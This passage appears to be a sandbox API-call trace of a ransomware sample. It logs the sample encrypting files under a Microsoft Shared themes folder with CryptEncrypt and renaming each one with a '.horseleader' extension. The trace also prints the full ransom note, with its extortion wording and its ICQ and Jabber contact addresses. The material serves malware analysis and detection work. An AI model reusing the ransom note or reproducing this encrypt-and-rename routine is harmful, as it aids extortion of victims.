lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0246.891] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0246.891] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x1212, lpOverlapped=0x0) returned 1 [0246.892] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffedee, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0246.892] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x1212, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x1212, lpOverlapped=0x0) returned 1 [0246.892] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0246.892] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aeb50*, 
nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aeb50*, lpNumberOfBytesWritten=0x32aeb7c*=0x4, lpOverlapped=0x0) returned 1 [0246.892] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aea98*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aea98*, lpNumberOfBytesWritten=0x32aeb7c*=0x80, lpOverlapped=0x0) returned 1 [0246.892] CloseHandle (hObject=0x1a4) returned 1 [0246.892] GetProcessHeap () returned 0x780000 [0246.893] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7e31a8 [0246.893] wnsprintfW (in: pszDest=0x7e31a8, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECHO\\THMBNAIL.PNG.horseleader") returned 89 [0246.893] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECHO\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\echo\\thmbnail.png"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECHO\\THMBNAIL.PNG.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\echo\\thmbnail.png.horseleader")) returned 1 [0246.894] GetProcessHeap () returned 0x780000 [0246.894] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7e31a8 | out: hHeap=0x780000) returned 1 [0246.894] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x376bcd00, ftCreationTime.dwHighDateTime=0x1c3ee72, ftLastAccessTime.dwLowDateTime=0x5ad12690, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x376bcd00, ftLastWriteTime.dwHighDateTime=0x1c3ee72, nFileSizeHigh=0x0, nFileSizeLow=0x6212, dwReserved0=0x96d8c05d, dwReserved1=0xeae5f6ce, cFileName="THMBNAIL.PNG", cAlternateFileName="")) returned 0 [0246.894] FindClose (in: hFindFile=0x7c6760 | out: 
hFindFile=0x7c6760) returned 1 [0246.894] wnsprintfW (in: pszDest=0x7e2960, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECHO\\#Decrypt#.txt") returned 78 [0246.894] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECHO\\#Decrypt#.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\echo\\#decrypt#.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0246.895] lstrlenA (lpString="All your files have been ENCRYPTED!!!\r\nWrite to our ICQ @Horseleader\r\nOr contact us via jabber - horseleader@xmpp.jp\r\nJabber client installation instructions:\r\nDownload the jabber (Pidgin) client from https://pidgin.im/download/windows/ \r\n\r\nAfter installation, the Pidgin client will prompt you to create a new account. \r\nClick - Add\r\nIn the -Protocol field, select XMPP \r\nIn -Username - come up with any name \r\nIn the field -domain - enter any jabber-server, there are a lot of them, for example - exploit.im \r\nCreate a password\r\nAt the bottom, put a tick -Create account \r\nClick add \r\nIf you selected -domain - exploit.im, then a new window should appear in which you will need to re-enter your data: \r\nUser \r\npassword \r\nYou will need to follow the link to the captcha (there you will see the characters that you need to enter in the field below) \r\nIf you don't understand our Pidgin client installation instructions, you can find many installation tutorials on youtube - https://www.youtube.com/results?search_query=pidgin+jabber+install \r\nIf you have not received a response from us then we may have technical problems and please write to us using Jaber here bigbosshorse@xmpp.jp or on icq \r\nAttention!\r\nDo not rename encrypted files. 
\r\nDo not try to decrypt your data using third party software, it may cause permanent data loss. \r\nDecryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam. \r\ntell your unique ID\r\n") returned 1508 [0246.895] WriteFile (in: hFile=0x158, lpBuffer=0xb41ca0*, nNumberOfBytesToWrite=0x5e4, lpNumberOfBytesWritten=0x32aeb98, lpOverlapped=0x0 | out: lpBuffer=0xb41ca0*, lpNumberOfBytesWritten=0x32aeb98*=0x5e4, lpOverlapped=0x0) returned 1 [0246.896] lstrlenA (lpString="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") returned 1368 [0246.896] WriteFile (in: hFile=0x158, lpBuffer=0x7d1740*, nNumberOfBytesToWrite=0x558, lpNumberOfBytesWritten=0x32aeb98, lpOverlapped=0x0 | out: lpBuffer=0x7d1740*, lpNumberOfBytesWritten=0x32aeb98*=0x558, lpOverlapped=0x0) returned 1 [0246.896] CloseHandle (hObject=0x158) returned 1 [0246.896] GetProcessHeap () returned 0x780000 [0246.896] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7e2960 | out: hHeap=0x780000) returned 1 [0246.897] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x51e3fe90, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x6d05ead0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6d05ead0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="ECLIPSE", cAlternateFileName="")) returned 1 [0246.897] lstrcmpiW (lpString1="ECLIPSE", lpString2="Windows") returned -1 [0246.897] wnsprintfW (in: pszDest=0x7e1110, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECLIPSE") returned 67 [0246.897] lstrcmpW (lpString1="ECLIPSE", lpString2=".") returned 1 [0246.897] lstrcmpW (lpString1="ECLIPSE", lpString2="..") returned 1 [0246.897] 
lstrcmpW (lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECLIPSE", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned -1 [0246.897] GetProcessHeap () returned 0x780000 [0246.897] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7e2960 [0246.897] wnsprintfW (in: pszDest=0x7e2960, cchDest=1024, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECLIPSE\\*") returned 69 [0246.897] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECLIPSE\\*", lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x51e3fe90, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x6d05ead0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6d05ead0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x96d8c05d, dwReserved1=0xeae5f6ce, cFileName=".", cAlternateFileName="")) returned 0x7c6760 [0246.898] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0246.898] wnsprintfW (in: pszDest=0x7e2960, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECLIPSE\\.") returned 69 [0246.898] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0246.898] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x51e3fe90, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x6d05ead0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6d05ead0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x96d8c05d, dwReserved1=0xeae5f6ce, cFileName="..", cAlternateFileName="")) returned 1 [0246.899] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 
[0246.899] wnsprintfW (in: pszDest=0x7e2960, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECLIPSE\\..") returned 70 [0246.899] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0246.899] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0246.899] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf9d57e00, ftCreationTime.dwHighDateTime=0x1cab7f1, ftLastAccessTime.dwLowDateTime=0x51eb22b0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xf9d57e00, ftLastWriteTime.dwHighDateTime=0x1cab7f1, nFileSizeHigh=0x0, nFileSizeLow=0x1cf31, dwReserved0=0x96d8c05d, dwReserved1=0xeae5f6ce, cFileName="ECLIPSE.ELM", cAlternateFileName="")) returned 1 [0246.899] lstrcmpiW (lpString1="ECLIPSE.ELM", lpString2="Windows") returned -1 [0246.899] wnsprintfW (in: pszDest=0x7e2960, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECLIPSE\\ECLIPSE.ELM") returned 79 [0246.899] StrStrIW (lpFirst="ECLIPSE.ELM", lpSrch=".horseleader") returned 0x0 [0246.899] lstrcmpW (lpString1="ECLIPSE.ELM", lpString2="#Decrypt#.txt") returned 1 [0246.899] lstrcmpW (lpString1="ECLIPSE.ELM", lpString2="_uninstalling_.png") returned 1 [0246.899] lstrlenW (lpString=".testttjffg") returned 11 [0246.899] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECLIPSE\\ECLIPSE.ELM", lpSrch=".testttjffg") returned 0x0 [0246.899] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0246.899] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0246.899] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft 
Shared\\THEMES14\\ECLIPSE\\ECLIPSE.ELM" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\eclipse\\eclipse.elm"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0246.900] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECLIPSE\\ECLIPSE.ELM") returned 79 [0246.900] StrStrW (lpFirst="ECLIPSE.ELM", lpSrch=".txt") returned 0x0 [0246.900] GetFileSizeEx (in: hFile=0x1a4, lpFileSize=0x32aeb58 | out: lpFileSize=0x32aeb58*=118577) returned 1 [0246.900] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0246.900] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0246.903] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0246.903] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0246.904] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xbf98, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0246.904] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0246.904] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0246.904] WriteFile (in: hFile=0x1a4, 
lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0246.904] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x17f31, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0246.905] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0246.905] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0246.905] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0246.905] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0246.905] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aeb50*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aeb50*, lpNumberOfBytesWritten=0x32aeb7c*=0x4, lpOverlapped=0x0) returned 1 [0246.905] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aea98*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aea98*, lpNumberOfBytesWritten=0x32aeb7c*=0x80, lpOverlapped=0x0) returned 1 [0246.905] CloseHandle (hObject=0x1a4) returned 1 [0246.906] GetProcessHeap () returned 0x780000 [0246.906] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7e31a8 [0246.906] wnsprintfW (in: pszDest=0x7e31a8, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECLIPSE\\ECLIPSE.ELM.horseleader") returned 91 
[0246.906] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECLIPSE\\ECLIPSE.ELM" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\eclipse\\eclipse.elm"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECLIPSE\\ECLIPSE.ELM.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\eclipse\\eclipse.elm.horseleader")) returned 1 [0246.907] GetProcessHeap () returned 0x780000 [0246.907] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7e31a8 | out: hHeap=0x780000) returned 1 [0246.907] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x376bcd00, ftCreationTime.dwHighDateTime=0x1c3ee72, ftLastAccessTime.dwLowDateTime=0x608b7590, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x376bcd00, ftLastWriteTime.dwHighDateTime=0x1c3ee72, nFileSizeHigh=0x0, nFileSizeLow=0x253, dwReserved0=0x96d8c05d, dwReserved1=0xeae5f6ce, cFileName="ECLIPSE.INF", cAlternateFileName="")) returned 1 [0246.907] lstrcmpiW (lpString1="ECLIPSE.INF", lpString2="Windows") returned -1 [0246.907] wnsprintfW (in: pszDest=0x7e2960, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECLIPSE\\ECLIPSE.INF") returned 79 [0246.907] StrStrIW (lpFirst="ECLIPSE.INF", lpSrch=".horseleader") returned 0x0 [0246.907] lstrcmpW (lpString1="ECLIPSE.INF", lpString2="#Decrypt#.txt") returned 1 [0246.907] lstrcmpW (lpString1="ECLIPSE.INF", lpString2="_uninstalling_.png") returned 1 [0246.907] lstrlenW (lpString=".testttjffg") returned 11 [0246.907] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECLIPSE\\ECLIPSE.INF", lpSrch=".testttjffg") returned 0x0 [0246.907] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) 
returned 1 [0246.907] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0246.907] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECLIPSE\\ECLIPSE.INF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\eclipse\\eclipse.inf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0246.908] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECLIPSE\\ECLIPSE.INF") returned 79 [0246.908] StrStrW (lpFirst="ECLIPSE.INF", lpSrch=".txt") returned 0x0 [0246.909] GetFileSizeEx (in: hFile=0x1a4, lpFileSize=0x32aeb58 | out: lpFileSize=0x32aeb58*=595) returned 1 [0246.909] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x253, lpOverlapped=0x0) returned 1 [0246.910] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xfffffdad, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0246.910] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x253, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x253, lpOverlapped=0x0) returned 1 [0246.910] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0246.910] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aeb50*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aeb50*, lpNumberOfBytesWritten=0x32aeb7c*=0x4, lpOverlapped=0x0) returned 1 [0246.910] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aea98*, 
nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aea98*, lpNumberOfBytesWritten=0x32aeb7c*=0x80, lpOverlapped=0x0) returned 1 [0246.910] CloseHandle (hObject=0x1a4) returned 1 [0246.911] GetProcessHeap () returned 0x780000 [0246.911] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7e31a8 [0246.911] wnsprintfW (in: pszDest=0x7e31a8, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECLIPSE\\ECLIPSE.INF.horseleader") returned 91 [0246.911] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECLIPSE\\ECLIPSE.INF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\eclipse\\eclipse.inf"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECLIPSE\\ECLIPSE.INF.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\eclipse\\eclipse.inf.horseleader")) returned 1 [0246.914] GetProcessHeap () returned 0x780000 [0246.914] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7e31a8 | out: hHeap=0x780000) returned 1 [0246.914] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x376bcd00, ftCreationTime.dwHighDateTime=0x1c3ee72, ftLastAccessTime.dwLowDateTime=0x6d05ead0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x376bcd00, ftLastWriteTime.dwHighDateTime=0x1c3ee72, nFileSizeHigh=0x0, nFileSizeLow=0x543, dwReserved0=0x96d8c05d, dwReserved1=0xeae5f6ce, cFileName="PREVIEW.GIF", cAlternateFileName="")) returned 1 [0246.914] lstrcmpiW (lpString1="PREVIEW.GIF", lpString2="Windows") returned -1 [0246.914] wnsprintfW (in: pszDest=0x7e2960, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECLIPSE\\PREVIEW.GIF") returned 79 
[0246.914] StrStrIW (lpFirst="PREVIEW.GIF", lpSrch=".horseleader") returned 0x0 [0246.914] lstrcmpW (lpString1="PREVIEW.GIF", lpString2="#Decrypt#.txt") returned 1 [0246.914] lstrcmpW (lpString1="PREVIEW.GIF", lpString2="_uninstalling_.png") returned 1 [0246.914] lstrlenW (lpString=".testttjffg") returned 11 [0246.914] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECLIPSE\\PREVIEW.GIF", lpSrch=".testttjffg") returned 0x0 [0246.914] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0246.914] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0246.914] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECLIPSE\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\eclipse\\preview.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0246.916] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECLIPSE\\PREVIEW.GIF") returned 79 [0246.916] StrStrW (lpFirst="PREVIEW.GIF", lpSrch=".txt") returned 0x0 [0246.916] GetFileSizeEx (in: hFile=0x1a4, lpFileSize=0x32aeb58 | out: lpFileSize=0x32aeb58*=1347) returned 1 [0246.916] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x543, lpOverlapped=0x0) returned 1 [0246.918] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xfffffabd, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0246.918] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x543, 
lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x543, lpOverlapped=0x0) returned 1 [0246.918] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0246.918] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aeb50*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aeb50*, lpNumberOfBytesWritten=0x32aeb7c*=0x4, lpOverlapped=0x0) returned 1 [0246.918] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aea98*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aea98*, lpNumberOfBytesWritten=0x32aeb7c*=0x80, lpOverlapped=0x0) returned 1 [0246.918] CloseHandle (hObject=0x1a4) returned 1 [0246.918] GetProcessHeap () returned 0x780000 [0246.918] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7e31a8 [0246.918] wnsprintfW (in: pszDest=0x7e31a8, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECLIPSE\\PREVIEW.GIF.horseleader") returned 91 [0246.919] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECLIPSE\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\eclipse\\preview.gif"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECLIPSE\\PREVIEW.GIF.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\eclipse\\preview.gif.horseleader")) returned 1 [0246.919] GetProcessHeap () returned 0x780000 [0246.919] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7e31a8 | out: hHeap=0x780000) returned 1 [0246.919] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x376bcd00, ftCreationTime.dwHighDateTime=0x1c3ee72, 
